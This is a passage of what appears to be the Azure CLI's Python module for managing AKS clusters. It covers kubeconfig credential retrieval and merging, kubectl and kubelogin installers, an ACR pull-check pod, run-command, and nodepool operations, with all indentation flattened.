addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return instance
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False, context_name=None, public_fqdn=False,
credential_format=None):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if credential_format:
credential_format = credential_format.lower()
if admin:
raise InvalidArgumentValueError("--format can only be specified when requesting clusterUser credential.")
if admin:
if cmd.cli_ctx.cloud.profile == "latest":
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
if cmd.cli_ctx.cloud.profile == "latest":
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType, credential_format)
else:
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
# Check if KUBECONFIG environmental variable is set
# If path is different than default then that means -f/--file is passed
# in which case we ignore the KUBECONFIG variable
# KUBECONFIG can be colon separated. If we find that condition, use the first entry
if "KUBECONFIG" in os.environ and path == os.path.join(os.path.expanduser('~'), '.kube', 'config'):
path = os.environ["KUBECONFIG"].split(":")[0]
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if key not in existing:
raise FileOperationError(
"No such key '{}' in existing config, please confirm whether it is a valid config file. "
"May back up this config file, delete it and retry the command.".format(
key
)
)
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != "Windows" and not os.path.islink(existing_file):
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith("600"):
logger.warning(
'%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file,
existing_file_perms,
)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
logger.warning(msg)
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError(
'usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError(
'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=service_principal, secret=client_secret
)
return sdk_no_wait(no_wait,
client.begin_reset_service_principal_profile,
resource_group_name,
name, service_principal_profile)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.begin_reset_aad_profile,
resource_group_name,
name, parameters)
def aks_check_acr(cmd, client, resource_group_name, name, acr, node_name=None):
if not acr.endswith(CONST_ACR_DOMAIN_NAME):
acr = acr + CONST_ACR_DOMAIN_NAME
if not which("kubectl"):
raise ValidationError("Can not find kubectl executable in PATH")
return_msg = None
fd, browse_path = tempfile.mkstemp()
try:
aks_get_credentials(
cmd, client, resource_group_name, name, admin=False, path=browse_path
)
# Get kubectl minor version
kubectl_minor_version = -1
try:
cmd = f"kubectl version -o json --kubeconfig {browse_path}"
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
jsonS, _ = output.communicate()
kubectl_version = json.loads(jsonS)
# Remove any non-numeric characters like + from minor version
kubectl_minor_version = int(re.sub(r"\D", "", kubectl_version["clientVersion"]["minor"]))
kubectl_server_minor_version = int(
kubectl_version["serverVersion"]["minor"])
kubectl_server_patch = int(
kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
logger.warning(
"There is a known issue for Kubernetes versions < 1.17.14 when connecting to "
"ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for"
"more information."
)
except subprocess.CalledProcessError as err:
raise ValidationError(
"Could not find kubectl minor version: {}".format(err))
if kubectl_minor_version == -1:
raise ValidationError("Failed to get kubectl version")
podName = "canipull-" + str(uuid.uuid4())
overrides = {
"spec": {
"restartPolicy": "Never",
"hostNetwork": True,
"containers": [
{
"securityContext": {"runAsUser": 0},
"name": podName,
"image": CONST_CANIPULL_IMAGE,
"args": ["-v6", acr],
"stdin": True,
"stdinOnce": True,
"volumeMounts": [
{"name": "azurejson", "mountPath": "/etc/kubernetes"},
{"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
],
}
],
"tolerations": [
{"key": "CriticalAddonsOnly", "operator": "Exists"},
{"effect": "NoExecute", "operator": "Exists"},
],
"volumes": [
{"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
{"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
],
"nodeSelector": {"kubernetes.io/os": "linux"},
}
}
if node_name is not None:
affinity = {
"nodeAffinity": {
"requiredDuringSchedulingIgnoredDuringExecution": {
"nodeSelectorTerms": [
{
"matchExpressions": [
{"key": "kubernetes.io/hostname", "operator": "In", "values": [node_name]}
]
}
]
}
}
}
overrides["spec"]["affinity"] = affinity
try:
cmd = [
"kubectl",
"run",
"--kubeconfig",
browse_path,
"--rm",
"--quiet",
"--image",
CONST_CANIPULL_IMAGE,
"--overrides",
json.dumps(overrides),
"-it",
podName,
"--namespace=default",
]
# Support kubectl versons < 1.18
if kubectl_minor_version < 18:
cmd += ["--generator=run-pod/v1"]
output = subprocess.check_output(
cmd,
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise AzureInternalError("Failed to check the ACR: {} Command output: {}".format(err, err.output))
if output:
print(output)
# only return the output in test case "test_aks_create_attach_acr"
test_hook_data = get_cmd_test_hook_data("test_aks_create_attach_acr.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("returnOutput", False):
return_msg = output
else:
raise AzureInternalError("Failed to check the ACR.")
finally:
os.close(fd)
return return_msg
# install kubectl & kubelogin
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
kubelogin_version='latest', kubelogin_install_location=None,
kubelogin_base_src_url=None):
k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
k8s_install_kubelogin(cmd, kubelogin_version,
kubelogin_install_location, kubelogin_base_src_url)
# install kubectl
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
if not source_url:
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"',
install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
# install kubelogin
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
cloud_name = cmd.cli_ctx.cloud.name
if not source_url:
source_url = 'https://github.com/Azure/kubelogin/releases/download'
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
if platform.machine() == 'arm64':
sub_dir, binary_name = 'darwin_arm64', 'kubelogin'
else:
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"',
download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode |
stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None, no_wait=False):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise ValidationError('Command cannot be empty.')
RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
# if this cluster have Azure AD enabled, we should pass user token.
# so the command execution also using current user identity.
# here we aquire token for AKS managed server AppID (same id for all cloud)
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
command_result_poller = sdk_no_wait(
no_wait, client.begin_run_command, resource_group_name, name, request_payload, polling_interval=5, retry_total=0
)
if no_wait:
# pylint: disable=protected-access
command_result_polling_url = command_result_poller.polling_method()._initial_response.http_response.headers[
"location"
]
command_id_regex = re.compile(r"commandResults\/(\w*)\?")
command_id = command_id_regex.findall(command_result_polling_url)[0]
_aks_command_result_in_progess_helper(client, resource_group_name, name, command_id)
return
return _print_command_result(cmd.cli_ctx, command_result_poller.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise ValidationError('CommandID cannot be empty.')
commandResult = client.get_command_result(resource_group_name, name, command_id)
if commandResult is None:
_aks_command_result_in_progess_helper(client, resource_group_name, name, command_id)
return
return _print_command_result(cmd.cli_ctx, commandResult)
def _aks_command_result_in_progess_helper(client, resource_group_name, name, command_id):
# pylint: disable=unused-argument
def command_result_direct_response_handler(pipeline_response, *args, **kwargs):
deserialized_data = pipeline_response.context.get("deserialized_data", {})
if deserialized_data:
provisioning_state = deserialized_data.get("properties", {}).get("provisioningState", None)
started_at = deserialized_data.get("properties", {}).get("startedAt", None)
print(f"command id: {command_id}, started at: {started_at}, status: {provisioning_state}")
print(
f"Please use command \"az aks command result -g {resource_group_name} -n {name} -i {command_id}\" "
"to get the future execution result"
)
else:
print(f"failed to fetch command result for command id: {command_id}")
client.get_command_result(resource_group_name, name, command_id, cls=command_result_direct_response_handler)
def _print_command_result(cli_ctx, commandResult):
# cli_ctx.data['safe_params'] contains list of parameter name user typed in, without value.
# cli core also use this calculate ParameterSetName header for all http request from cli.
if (cli_ctx.data['safe_params'] is None or
"-o" in cli_ctx.data['safe_params'] or
"--output" in cli_ctx.data['safe_params']):
# user specified output format, honor their choice, return object to render pipeline
return commandResult
# user didn't specified any format, we can customize the print for best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(
f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
f"finished at {commandResult.finished_at} "
f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
# . means to attach current folder, cannot combine more files. (at least for now)
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise ValidationError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise ValidationError(
f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir() // use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
# legacy: dev space command
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
# legacy: dev space command
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(
name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError(
"Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
# legacy: dev space command
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(
name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
# legacy: dev space command
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
# legacy: dev space command
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
# legacy: dev space command
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error(
"Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
# legacy: dev space command
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (
ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def aks_agentpool_add(
cmd,
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version=None,
node_vm_size=None,
os_type=None,
os_sku=None,
snapshot_id=None,
vnet_subnet_id=None,
pod_subnet_id=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
enable_cluster_autoscaler=False,
min_count=None,
max_count=None,
node_count=3,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float("nan"),
labels=None,
tags=None,
node_taints=None,
node_osdisk_type=None,
node_osdisk_size=0,
max_surge=None,
mode=CONST_NODEPOOL_MODE_USER,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
max_pods=0,
zones=None,
ppg=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
enable_fips_image=False,
kubelet_config=None,
linux_os_config=None,
no_wait=False,
aks_custom_headers=None,
):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from azure.cli.command_modules.acs.agentpool_decorator import AKSAgentPoolAddDecorator
from azure.cli.command_modules.acs._consts import AgentPoolDecoratorMode
aks_agentpool_add_decorator = AKSAgentPoolAddDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
agentpool_decorator_mode=AgentPoolDecoratorMode.STANDALONE,
)
try:
# construct agentpool profile
agentpool = aks_agentpool_add_decorator.construct_agentpool_profile_default()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to add a real agentpool
return aks_agentpool_add_decorator.add_agentpool(agentpool)
def aks_agentpool_update(
cmd,
client,
resource_group_name,
cluster_name,
nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None,
max_count=None,
labels=None,
tags=None,
node_taints=None,
max_surge=None,
mode=None,
scale_down_mode=None,
no_wait=False,
aks_custom_headers=None,
):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from azure.cli.command_modules.acs.agentpool_decorator import AKSAgentPoolUpdateDecorator
from azure.cli.command_modules.acs._consts import AgentPoolDecoratorMode
aks_agentpool_update_decorator = AKSAgentPoolUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
agentpool_decorator_mode=AgentPoolDecoratorMode.STANDALONE,
)
try:
# update agentpool profile
agentpool = aks_agentpool_update_decorator.update_agentpool_profile_default()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real agentpool
return aks_agentpool_update_decorator.update_agentpool(agentpool)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
max_surge=None,
no_wait=False,
aks_custom_headers=None,
snapshot_id=None):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings', operation_group='agent_pools')
if kubernetes_version != '' and node_image_only:
raise CLIError(
'Conflicting flags. Upgrading the Kubernetes version will also '
'upgrade node image version. If you only want to upgrade the '
'node version please use the "--node-image-only" option only.'
)
# Note: we exclude this option because node image upgrade can't accept nodepool put fields like max surge
if max_surge and node_image_only:
raise MutuallyExclusiveArgumentError(
'Conflicting flags. Unable to specify max-surge with node-image-only.'
'If you want to use max-surge with a node image upgrade, please first '
'update max-surge using "az aks nodepool update --max-surge".'
)
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
# load model CreationData
from azure.cli.command_modules.acs.decorator import AKSModels
CreationData = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).CreationData
creationData = None
if snapshot_id:
snapshot = get_snapshot_by_snapshot_id(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
allow_appending_values_to_same_key=True,
)
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
headers=aks_custom_headers,
)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_nodepool_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
snapshot_name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# load model CreationData, Snapshot
from azure.cli.command_modules.acs.decorator import AKSModels
CreationData = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).CreationData
